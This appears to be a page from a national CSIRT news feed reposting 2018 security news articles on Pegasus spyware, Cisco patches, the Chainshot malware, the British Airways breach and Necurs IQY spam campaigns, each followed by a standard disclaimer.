Ειδοποιήσεις

One of the world’s most dangerous Android and iPhone spyware program has been found deployed against targets across 45 countries around the world over the last two years, a new report from Citizen Lab revealed.

The infamous spyware, dubbed Pegasus, is developed by NSO Group—an Israeli company which is mostly known for selling high-tech surveillance tools capable of remotely cracking into iPhones and Android devices to intelligence agencies around the world.

Pegasus is NSO Group’s most powerful creation that has been designed to hack iPhone, Android, and other mobile devices remotely, allowing an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user’s location, microphone, and camera—all without the victim’s knowledge.

Pegasus has previously been used to target human rights activists and journalists, from Mexico to the United Arab Emirates.

Just last month, reported that this nasty spyware was used against one of the staffers of Amnesty International—one of the most prominent non-profit human rights organizations in the world—earlier this year, alongside another human rights defender.

 

Now, a new report released Tuesday from the University of Toronto’s Citizen Lab revealed that the Pegasus infections have victimized more countries than previously believed.

36 Pegasus Spyware Operations Found Deployed in 45 Countries

Citizen Lab last month said that it had so far counted as many as 174 publicly-reported cases of individuals worldwide “abusively targeted” with NSO spyware, but now found traces of Pegasus infections across as many as 45 countries.

According to the report, 36 Pegasus operators have been using the spyware to conduct surveillance operations in 45 countries worldwide, and at least 10 of these operators appear to be actively engaged in cross-border surveillance.

The report further said that while some NSO customers may be lawfully using Pegasus, at least 6 of those countries with significant Pegasus operations were “known spyware abusers,” which means they have previously been linked to the abusive use of spyware to target civil society.

 

These “known spyware abusers” include Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia, and the United Arab Emirates.

The list of countries targeted by Pegasus includes Algeria, Bahrain, Bangladesh, Brazil, Canada, Cote d’Ivoire, Egypt, France, Greece, India, Iraq, Israel, Jordan, Kazakhstan, Kenya, Kuwait, Kyrgyzstan, Latvia, Lebanon, Libya, Mexico, Morocco, the Netherlands, Oman, Pakistan, Palestine, Poland, Qatar, Rwanda, Saudi Arabia, Singapore, South Africa, Switzerland, Tajikistan, Thailand, Togo, Tunisia, Turkey, the UAE, Uganda, the United Kingdom, the United States, Uzbekistan, Yemen, and Zambia.

Since Citizen Lab tracked down Pegasus infections by creating fingerprints for Pegasus infrastructure to identify the IP addresses associated with the same spyware system, it admitted that there could be some inaccuracies in its report, due to the possible use of VPN and satellite connections by some of its targets.

Citizen Lab is keeping those fingerprints secret for now but found they could then be detected by scanning the internet.

Spyware Creator “NSO Group” Response:

In response to the Citizen Lab report, an NSO Group spokesperson released a statement saying that the company worked in full compliance with all countries without breaking any laws, including export control regulations.

“Contrary to statements made by you, our product is licensed to government and law enforcement agencies for the sole purpose of investigating and preventing crime and terror. Our business is conducted in strict compliance with applicable export control laws,” NSO Group spokesperson Shalev Hulio told Citizen Lab.

“NSO’s Business Ethics Committee, which includes outside experts from various disciplines, including law and foreign relations, reviews and approves each transaction and is authorized to reject agreements or cancel existing agreements where there is a case of improper use.”

The NSO Group further said that there were some problems with the Citizen Lab research and that the company did not sell in many of the 45 countries listed in the report.

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Cisco today released thirty security patch advisory to address a total of 32 security vulnerabilities in its products, three of which are rated critical, including the recently disclosed Apache Struts remote code execution vulnerability that is being exploited in the wild.

Out of the rest 29 vulnerabilities, fourteen are rated high and 15 medium in severity, addressing security flaws in Cisco Routers, Cisco Webex, Cisco Umbrella, Cisco SD-WAN Solution, Cisco Cloud Services Platform, Cisco Data Center Network, and more products.

The three critical security vulnerabilities patched by Cisco address issues in Apache Struts, Cisco Umbrella API, and Cisco RV110W, RV130W and RV215W router’s management interface.

Apache Struts Remote Code Execution Vulnerability (CVE-2018-11776)

The vulnerability, reported late last month by Semmle security researcher Man Yue Mo, resides in the core of Apache Struts and originates due to insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations.

“The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action,” Cisco explains in its advisory.

“In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing.”

An unauthenticated, remote attacker can trigger the vulnerability by tricking victims to visit a specially crafted URL on the affected web server, allowing the attacker to execute malicious code and eventually take complete control over the targeted server running the vulnerable application.

All applications that use Apache Struts—supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions—are potentially vulnerable to this flaw, even when no additional plugins have been enabled.

Apache Struts patched the vulnerability with the release of Struts versions 2.3.35 and 2.5.17 last month. Now, Cisco has also released fixes to address the issue in its several products. You can check the list of vulnerable Cisco products here.

Since there are no workarounds for this issue, organizations and developers are strongly advised to update their Struts components as soon as possible.

Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435)

The second critical vulnerability patched by Cisco resides in the Cisco Umbrella API that could allow an authenticated, remote attacker to view and modify data across their organization as well as other organizations.

Cisco Umbrella is a cloud security platform that provides the first line of defense against threats over all ports and protocols by blocking access to malicious domains, URLs, IPs, and files before a connection is ever established or a file is downloaded.

The vulnerability resides due to insufficient authentication configurations for the API interface of Cisco Umbrella, and successful exploitation could allow an attacker to read or modify data across multiple organizations.

Cisco has patched the vulnerability addressed this vulnerability in the Cisco Umbrella production APIs. No user action is required.

Cisco Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423)

The last, but not the least, critical vulnerability resides in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router that could allow an unauthenticated, remote attacker to execute arbitrary code or cause a DoS condition.

The flaw occurs due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. To exploit this vulnerability, an attacker can send malicious requests to a targeted device, triggering a buffer overflow condition.

“A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code,” the company explains.

This vulnerability affects all releases of Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router.

Cisco has addressed this vulnerability in firmware release 1.0.3.44 for the Cisco RV130W Wireless-N Multifunction VPN Router, and will not release firmware updates for the Cisco RV110W Wireless-N VPN Firewall and Cisco RV215W Wireless-N VPN Router. According to the company’s Product Security Incident Response Team (PSIRT), Apache Struts is being exploited in the wild, while the team is not aware of any exploits leveraging the other two critical flaws.

The Bottom Line: Patch! Patch! Patch!

 

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Security researchers exploited a threat actor’s poor choice for encryption and discovered a new piece of malware along with network infrastructure that links to various targeted attacks.

The new piece of malware, which received the name Chainshot, is used in the early stages of an attack to activate a downloader for the final payload in a malicious chain reaction.

Researchers from of Palo Alto Networks Unit 42 found Chainshot after following the trails of an Adobe Flash zero-day exploit (CVE-2018-5002) used in a series of targeted malware campaigns.

Cracking the encryption

By studying network captures of traffic exchanged with the attacker’s command and control (C2) servers, Unit 42 malware analysts noticed that the malware payload was encrypted with a 512-bit RSA key. The RSA (Rivest–Shamir–Adleman) cryptosystem uses an asymmetric key algorithm, where a public key is used to encrypt data and a private one is required to decrypt it.

Cracking a 512-bit key is possible since 1999 when factoring the modulus required 300 computers working for a period of seven months. Today, all you need is money to rent cloud computing power and a few hours of waiting time.

In a technical report today, the researchers explain how they were able to crack the private key that decrypted Chainshot.

“While the private key remains only in memory, the public keys’ modulus n is sent to the attacker’s server. On the server side, the modulus is used together with the hardcoded exponent e 0x10001 to encrypt the 128-bit AES key which was used previously to encrypt the exploit and shellcode payload,” they write.

Using Factoring as a Service (FaaS), the researchers were able to calculate the decryption key and access the Chainshot malware.

Chainshot is multipurpose

Apart from being part of a chain reaction that makes it difficult to analyze components individually, Chainshot contains code designed to search for and bypass Kaspersky and Bitdefender antivirus solutions for both x86 and x64 platforms.

Palo Alto told BleepingComputer that the attack occurred in May, and that they couldn’t verify at the time of the analysis that the bypass code worked against Kaspersky and Bitdefender defenses. Bitdefender confirmed us that their users are protected against Chainshot since July. Kaspersky’s Artem Baranov said that he would test the exploit with the Automatic Exploit Prevention component.

Chainshot’s task is to push another malware on the compromised machine, which drops the final payload. The dropper is also responsible for fingerprinting the system, sending details about the user and the processes running on the machine. Because the adversary made the mistake of using insecure encryption and recycling an SSL certificate in other attacks, security researchers were able to correlate the campaign with other incidents and paint a more clear picture of the entire operation.

 

The information contained in this website is for general information purposes only. The information is gathered from Bleeping Computer while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

British Airways, who describes itself as “The World’s Favorite Airline,” has confirmed a data breach that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks.

In a statement released by British Airways on Thursday, customers booking flights on its website (ba.com) and British Airways mobile app between late 21 August and 5 September were compromised. The airline advised customers who made bookings during that 15 days period and believe they may have been affected by this incident to “contact their banks or credit card providers and follow their recommended advice.”

British Airways stated on its Twitter account that personal details stolen in the breach included their customers’ names and addresses, along with their financial information, but the company assured its customers that the hackers did not get away with their passport numbers or travel details.

The company also said that saved cards on its website and mobile app are not compromised in the breach. Only cards that have been used by you to make booking payments during the affected period are stolen.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app,” the company said in a statement. “The stolen data did not include travel or passport details.”

Although the statement released by the did not mention the number of affected customers, the company’s spokesperson confirmed to the media that some 380,000 payment cards were compromised in the breach. Also currently, it is not clear how the data breach occurred, but some media outlets are reporting that the breach was identified when “a third party noticed some unusual activity” and informed the company about it.

A spokesperson from British Airways confirmed The Hacker News that “this is data theft, rather than a breach,” which suggests someone with privileged access to the data might have stolen it.

British Airways also informed the police and the Information Commissioner and currently reaching out to affected customers directly. However, the company assured its customers that the security breach has now been resolved, and its website is working normally and is now safe for passengers to check-in online, and book flights online.

The National Crime Agency is aware of the British Airways data breach and is “working with partners to assess the best course of action.”

Air Canada also suffered a severe data breach late last month, which, along with personal data, also exposed passport number and other passport and travel details of about 20,000 mobile app customers.

 

The information contained in this website is for general information purposes only. The information is gathered from The Hacker News while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Necurs botnet distributed over 780,000 emails in five campaigns earlier this year, all containing weaponized IQY files – the latest method for delivering malware. The volume is quite low for a botnet responsible for 60% of the world’s spam traffic in the last quarter of 2017.

 

However, the use of weaponized IQY files is a rising trend in malspam campaigns, with Necurs being first spotted to distribute malware using this type of files on March 25.

IQY files are basically text documents that can contain a web location for importing data into Excel spreadsheets; they are common in enterprise networks, where employees use them for collaboration purposes. They are not a threat in themselves but the information retrieved from an external source can contain malicious code.

Microsoft Office does not allow automatic execution of code from an IQY and asks for user permission to do so. But a well-crafted email may trick the user into enabling data connections in IQY files.

Emails sent over a period of a month and a half

IBM X-Force caught the 780,000 emails that Necurs operators laced with weaponized IQY files between late May and mid-July.

As observed by the researchers, Necurs spam factory sent out on May 25 over 300,000 messages. The second campaign on June 7 delivered about 200,000 emails.

The numbers spiraled down in the next spam bursts, with over 150,000 emails distributed on June 13, and less than 100,000 on July 13. The last throb was recorded on July 17 and was the weakest one, distributing less than 50,000 messages.

 

Some of the emails purported to be unpaid invoices, a common pretext that lures the victim into accessing the URL inside the IQY file. When the connection was approved, the embedded URL provided a remote access tool called FlawedAmmyy RAT, whose source code was leaked in March.

Other malware delivered by Necurs include Marap and Quant Loader, two downloaders that can funnel in various types of threats. Cybercriminals are constantly looking to change their game by using file types that are typically overlooked as a potential threat.

“To ensure that their malicious emails reach recipients and do not end up blocked by email filters, cybercrime groups shuffle their tactics all the time, delivering booby-trapped files in many shapes throughout the year,” X-Force researchers note.

 

The information contained in this website is for general information purposes only. The information is gathered from Bleeping Computer while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.